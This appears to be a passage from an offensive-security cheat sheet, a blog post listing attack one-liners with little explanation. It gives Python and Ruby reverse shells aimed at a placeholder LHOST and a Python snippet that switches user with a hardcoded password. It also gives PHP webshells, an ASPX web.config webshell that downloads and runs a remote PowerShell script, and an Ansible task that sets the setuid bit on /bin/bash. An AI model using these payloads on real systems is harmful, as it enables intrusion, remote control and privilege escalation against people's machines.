$stream.Dispose()
Python Reverse Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c 'import pty,subprocess,os,time;(master,slave)=pty.openpty();p=subprocess.Popen(["/bin/su","-c","id","bynarr"],stdin=slave,stdout=slave,stderr=slave);os.read(master,1024);os.write(master,"fruity\n");time.sleep(0.1);print os.read(master,1024);'

echo python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > <FILE>
Ruby Reverse Shell
ruby -rsocket -e'f=TCPSocket.open("<LHOST>",<LPORT>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Webshells

PHP Webshell
<?php system($_GET['cmd']); ?>
<?php echo exec($_POST['cmd']); ?>
<?php echo passthru($_GET['cmd']); ?>
<?php passthru($_REQUEST['cmd']); ?>
<?php echo system($_REQUEST['shell']); ?>

Template Injection

ASPX Webshell

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Set s = CreateObject("WScript.Shell")
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://<LHOST>/shellyjelly.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-->

Bad YAML

- hosts: localhost
  tasks:
    - name: badyml
      command: chmod +s /bin/bash

https://sh1yan.top/2024/06/01/Attack-certificate-memorandum-20230311-0xsyr0/
Author: shiyan
Published: June 1, 2024